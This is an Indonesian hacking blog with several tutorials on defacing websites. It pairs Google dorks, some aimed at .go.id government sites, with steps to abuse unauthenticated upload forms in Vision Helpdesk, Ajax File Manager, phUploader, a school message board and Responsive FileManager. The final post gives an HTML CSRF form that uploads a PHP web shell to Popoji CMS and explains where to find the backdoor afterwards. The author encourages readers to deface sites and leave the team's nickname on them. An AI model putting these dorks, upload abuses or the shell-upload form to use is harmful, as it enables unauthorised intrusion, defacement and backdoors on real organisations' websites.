Senin, 29 Agustus 2016

Deface Dengan Open New Ticket Vulnerability

Haii Gan Selamat Pagie kali Saya DeathCreppy Akan Share Deface Dengan Open New Ticket Vulnerability ,Sepertinya Sudah Mulai Banyak Yang Memakai Method ini, Yupzz Langsung Saja ke KTP ;) 
Jaga Mata Gan :v 

Oke Pertama taulahh ngapain :v >v<

Dork :
visionhelpdesk intext:Submit ticket - Help Desk Software Powered by Vision Helpdesk - visionhelpdesk intext:/submit/ticket      -intext:choose files here site:go.id

        -inurl:"/helpdesk/new_ticket.php?"
        -intext:Helpdesk site:go.id site 

kembangin Sendiri Selanjutnya gan ^-^ Biar Dapat Bnyak Vuln Search di Google Dorknya Pilih Salah Satu ^-^ kalau Sudah Pilih Salah Satu Websitenya ^-^ Liat Gambar Di bawah ini Dan Isi Data-Data Yang Di perlukan Saja ^-^ >v< Cukup Mudah kan ??
nahh Kalau Sudah di isi Data Tersebut >v< nnti akan Muncul gambar yang di Atas ... tidak usah takut ^-^ klik File Yang Kalian Upload "DC.html"nya sperti d gambar di atas
Nahh Hasilnya Jadi Dehh ,Taaraaa !! >v< Selamat Mencoba Bolehh Donk Kalau Nitip Nick And Team >v< Nick : DeathCreppy Team : Jones Unlimited Edition

Minggu, 21 Agustus 2016

Deface Website Dengan Ajax File Manager

Banyak orang-orang yang melupakan teknik pepes yang satu ini, mungkin mereka pikir target nya kaga fresh atau mereka anggap teknik ini sudah mati karena target nya kaga perawan di notif ?
Notif-Notif dan Notif yang mereka kejar padahal sih santai aja..

Bahan-Bahan :

# Dork :
  1. intitle:"Ajax File Manager" site:au
  2. inurl:/ajaxfilemanager.php intext:"/Root Folder"
  3. inurl:/ajaxfilemanager.php intext:"upload"
  4. inurl:/ajaxfilemanager.php .ac.
  5. intitle:"index of" intext:"ajaxfilemanager.php"
Kembangkan Lagi Dengan Otak Hentai yang kalian miliki !!! :v (Peace !) 
Note : site: boleh di ganti dengan domain atau di hapus
# File txt yang mau di upload
Kalo mau keren pake ASCII aja : klik disini

Step by Step :

1. Sebagai Contoh gw pakai dork yang ke 5. lalu seraching di gugel

2. Setelah sekian lama milih target, gw dapet 1 yang perawan..


3.  Setelah gw klik tuh file ajaxfilemanager.php, gw langsung berubah jadi power ranger pink !!!!

4. Setelah masuk ke Ajax File Manager nya, kalian klik tombol upload di pojok kanan atas..

5. Pilih file .txt kalian...


6. Setelah berhasil upload akan mucul nama file kalian..

7. Akses file nya gmna ?? ini akan sedikit memakan emosi, energi jiwa dan raga, !! persiapkan mental kalian. :v

8. Arahkan Cursor kalian ke gambar icon file yang telah kalian upload.. (liat gambar)


9. Di Pojok kiri bawah mucul lah link file kalian,, tinggal kalian pikir bagaimana akses nya :v
mau di ketik manual boleh.. mau di diemin juga boleh :v

Deface Dengan phUploader Vulnerbility File Upload

Tutorial "Deface Dengan phUploader Vulnerbility File Upload". memang cuma upload file .txt sih tapi lumayan bisa masuk ke beberapa mirror. simak aja dah tutorialnya..


                                       Nitip Nick And Team Yahh Sayang ^-^ :* 
                                       DeathCreppy | Jones Unlimited Edition

Bahan-Bahan :

Dork Google :
# intitle:Powered by phUploader
Kembangkan lagi ya mblo :v

File Text kalian..
Kalo pengen variasi pakai text to ASCII aja cari di gugel.


Step by Step :

1. Dorking lah di gugel seperti biasa.

2. Pilih target yang soleha, rajin sholat, pandai masak :v

3. Setelah terbuka kalian akan langsung masuk ke Form Upload File nya




4. klik browse lalu pilih file text kalian.

5. lalu kalian klik tombol upload, itu kan ada 2 tombol yang kiri biasanya tombol upload



 6. Setelah sukses akan muncul url bokep kalian..



 7. Aksesnya tinggal klik aja Url nya, klo ga bisa di klik, ya Use Your Brain

8. Selesai,, terserah mau di apain setelah itu :v

Deface dengan Teknik Message Board

Lanjut Walking Blog geenggs, wkwk dah lama nih gua gak share Bug and metode Defacenye >.<"
hahaha kalem, Kalii ini kite akan bahas dan Praktek salahsatu celah/bug Message Board Forum.
Kuyy langsung Tutorial Deface dengan Teknik Message Board Forum atau Deface High School

Play with Me , Baby ;*



Dork :
inurl:"/forum.php?forumid="
inurl:"/forum_topic_create.php?"
intext:Welcome to our electronic class yearbook

eXploit:
/forum_topic_create.php?forumid=1

1. Dorking menggunakan Search Engine

2. Pilih target kalian yg ada gambar "Message Board" atau yang bertulisan High School


3.  Pilih new topic (kalo dork yg kedua dah langsung ke new topic itu), atau Langsung masukin bae eXploitnye.

contoh: kocokin.org/forum_topic_create.php?forumid=1

4. isi aja sesuka Lu *ngasal :D (kecuali pass verification isi yang bener)


5. Di attach file, pilih file.txt kalian *karna di Bug ini hanya mengizinkan File .txt tapii untuk kalian yg suka mirrorin web bisa kok di masukin ke notify archive kesayangan Lu wkwk


6. Setelah itu klik cancel ( ya klik post lah)




Shell/File Aksesnya ?

Setelah tadi, Post Topic sukses, kalian akan di alihkan ke halaman berikut nya..
di halaman itu akan ada info topic yang kalian post tadi, di bagian Attached File : namafile.txt kalian klik namafile.txt kalian :D



Mudahkan ^-^ ?
Boleh Donk Nitip Nama & Team ^-^
DeathCreppy | Jones Unlimited Edition <(")


bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy Defacing gan ~
Sekian dan semoga bermanfaat .. terimakasih

Minggu, 14 Agustus 2016

Deface Dengan Responsive FileManager

Kali Ini Saya Akan Share "Deface Dengan Responsive FileManager"  Sepertinya Mau Buming :v yupz langsung aj ke KTP ^-^ 

Bahan-Bahan :

Dork :
  1. inurl:/filemanager/ intext:"dialog.php"
  2. inurl:/js/filemanager/ intext:"dialog.php"
  3. inurl:/assets/filemanager/ intext:"dialog.php"

Exploit (File yang terinfeksi/bisa di exploit) :
dialog.php
example : www.ngecrotz.co.li/filemanager/dialog.php

Script Pepes
klo belum punya bikin atau colong punya orang

Step by Step :

1. Seperti biasa,, dorking adalah hal wajib.. dorking di Google  pake dork di atas ( Bebas Tinggal Pilih )

2. Pilih target nyaa..

Klik Pada Bagian "dialog.php"

3. Setelah klik dialog.php kalian akan beralih ke "Responsive FileManager "

4. Cari aja tombol upload di pojok atas kiri (biasanya di situ)

Klik Aja Untuk Upload File Anda

5. Setelah itu kalian klik lalu pilih script deface kalian

6. Jika sukses hasilnya seperti ini..

7. Untuk aksesnya kalian.. kembali dlu ke awal "Responsive FileManager" nya (klik tombol hitam di atas) lupa gw tandain :v

8. Klik kanan pada file yang telah kalian upload tadi,, lalu pilih Show URL


9. Kalian Copy url nya terus paste di address bar browser kamu.. dan jrengg-jrengg..

10. Nitip nick boleh kali ?? DeathCreppy

11. Nitip nama Jones Unlimited Edition boleh kali ??


Note : Semoga Bermanfaat Buat Anda ^-^ Keep Solidaritas ^-^ >v< 

Senin, 01 Agustus 2016

Cara Upload Shell di CMS Popoji

Pertama Lu harus sudah mendapatkan akses Login sebagai admin di web target !!
kalo sudah punya akun admin yang sudah terverif/aktif silahkan Lu login , sampai muncul ke page Dashbor admin


kalo dah Login, langsung buka URL bug/vuln di: 
target.c0li/po-admin/js/plugins/uploader/upload.php

Ciri2 Vuln o.O ?
{"jsonrpc" : "2.0", "result" : null, "id" : "id"}

nb: wajib Login ke halaman dashbor dlu yee, kalo mau liat ini letak bugnyee
CSRF Code:

<form method="post" action="target.c0li/po-admin/js/plugins/uploader/upload.php" enctype="multipart/form-data">
<input type="file" name="file">
<input type="hidden" name="name" value="nama_shell_anda.php">
<input type="submit" value="exploit">
</form>

* save dgn ekstensi .html
* lalu bukak dengan browser kalean.

upload Shell lu. ingat shell kalian disini yang kalian upload harus berEkstensi .jpg (note: shellLu.jpg) , bukanlah .php, .phtml ataupun jenis bypass ekstensi yang lainnyaa
jika berhasil . hasil output nya akan sama kyk yang pertama. tidak ada tulisan error sama sekali




Terus cara tau Letak Shell nye Piye Om o.O ??


buka folder /po-upload/ , carane bukak url: target.c0li/po-content/po-upload/ , liat list yang kek di SS, carii shell lu, kalo dah ketemu Klik ae ..
kaloo pas folder /po-upload/ nya di buka ternyata muncul notice Forbidden wkkw, silahkan muter otak anda utk mencari backdoor lu wkwk.



akses shell: 
target/po-content/po-upload/nama_shell_anda-[angka_random]-polibrary.php



Sekian Artikel Cara MengUpload Backdoor pada CMS Popoji.
Mudahkan x_O ?
bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy Defacing gan ~
Sekian dan semoga bermanfaat .. terimakasih
All Right Reserved • 2013 Dark Blue Elucidator V3 • Design By : Dimas Galang Ramadhan